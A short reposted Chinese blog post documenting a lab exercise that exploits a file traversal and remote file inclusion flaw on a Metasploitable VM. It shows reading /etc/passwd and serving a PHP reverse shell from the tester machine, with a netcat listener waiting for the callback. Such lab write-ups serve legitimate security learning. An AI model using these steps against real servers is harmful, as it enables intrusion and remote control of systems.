小言_互联网的博客

文件遍历漏洞实验

309人阅读  评论(0)
title: 文件遍历漏洞实验
tags: web渗透
categories: 渗透测试
  1. 环境搭建 测试机ip:192.168.86.135 靶机metasploittable的ip:192.168.86.128 靶机编辑php.ini文件

sudo vim /etc/php5/cgi/php.ini  //编辑php配置文件

找到allow_url_include这一行把Off改成On,

sudo /etc/init.d/apache2 restart //重启apache服务 
  1. 发起攻击

  • 尝试文件/etc/passwd遍历查看,成功。

  • 尝试定位url链接,成功

  • 测试机开启apache服务,制作php反弹shell,使其定位其链接http://192.168.86.135/1.php

cp /url/share/webshells/php/php-reverse-shell.php /var/www/html/1.php  //复制成1.php到web目录下  
vim 1.php //修改127.0.0.1成测试机ip完成保存  
service apache2 start  //开启apache服务<br>
nc -nvvlp 1234  //nc开启监控端口
​

 


转载:https://blog.csdn.net/weixin_41217671/article/details/102489307
查看评论
* 以上用户言论只代表其个人观点,不代表本网站的观点或立场